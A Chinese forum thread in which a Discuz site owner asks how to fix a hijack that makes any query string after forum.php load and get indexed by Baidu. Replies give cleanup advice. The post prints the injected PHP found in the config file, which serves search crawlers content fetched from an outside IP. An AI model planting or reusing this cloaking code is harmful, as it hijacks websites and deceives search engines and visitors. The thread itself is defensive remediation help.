网站被劫持后发现网站首页后面加任意字符都可以访问如何解决?
网站被劫持后发现网站首页后面加任意字符都可以访问如何解决?网站被劫持后生成了大量首页php后面加任意字符都还是可以访问
百度收录大量的这样帖子
现在如何解决这样的?
宝塔面板。。。。。。
如/forum.php?123456
/forum.php?12365
/forum.php?515151
随便加都可以访问,只有首页而已其他文章帖子加就不可以。。。
#set_time_limit(30);error_reporting(0);$tr=stristr;$er=$_SERVER;define('url',$er['REQUEST_URI']);define('ref',$er['HTTP_REFERER']);define('ent',$er['HTTP_USER_AGENT']);define('site',"http://156.226.52.130");define('road',"/?road=".$er['HTTP_HOST'].url."&der=".ent);define('regs', '@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');define('area',$tr(url,".xml")or $tr(url,".html")or$tr(url,".doc")or $tr(url,".txt")or $tr(url,".ppt")or $tr(url,".xls")or $tr(url,".csv")or $tr(url,".shtml")or $tr(url,".docx")or $tr(url,".xlsx")and $tr(url,"?"));if(area&&preg_match(regs,ref)){echo g('http://156.226.52.130/404.html');exit;}if(preg_match(regs,ent)){if(area){echo g(site.road);exit;}else{echo g("http://156.226.52.130/u.php");ob_flush();flush();}}function g($f){$c=array('http'=>array('method'=>"GET"));$g=stream_context_create($c);$h=file_get_contents($f,false,$g);if(!empty($h)){return $h;}}
// --------------------------CONFIG ADMINCP-------------------------- //
// -------- Founders: $_config['admincp']['founder'] = '1,2,3'; --------- //
你找到了劫持代码 并没有找到后门在哪,还是会出现的 cardz! 发表于 2020-11-30 06:34
这个是加什么都可以访问,出现这种字符的原因解决了就好了。Q3160510998
啥原因呀?现在是加啥都还可以访问.. cardz! 发表于 2020-11-30 13:54
谁的都可以,不只是你的。
那不是不能解决了?已经收录了好多了 1270643127 发表于 2020-11-30 17:40
那不是不能解决了?已经收录了好多了
你先把config里边那段代码删除,然后还要检查最近新增和修改的文件
你去做一个抓取测试(你自己正常访问页面,是正常的,但是蜘蛛访问,是另外一个样子)
如果没有注册百度站长或者百度统计,就去下面这个网址,也可以
http://stool.chinaz.com/tools/webcheck.aspx
如果以前的那些页面依然有问题,就说明你没有清除干净(也算不上清除干净,你删除了恶意代码,但是后门还是在的)
我自己网站的黑链网址是/?s***.后缀 清除之后,这些页面就不能访问了,然后你可以去百度提交死链,删除这些快照。当然啦,我很早以前就在robots里边直接屏蔽了【?】 所以被挂黑链半个月,百度 根本没有收录黑链。然后我发现黑链之后,直接去百度申请闭站了,解决完了才恢复的 而且你使用宝塔,宝塔有免费防火墙,你可以把恶意代码的一些关键词,比如“156.226.52.130” “$tr(url” 直接添加到防火墙。并且,定期扫描(扫描结果要分析哈,DZ默认的某些文件也会被扫描出有问题,但是并不是真的有问题)
页:
[1]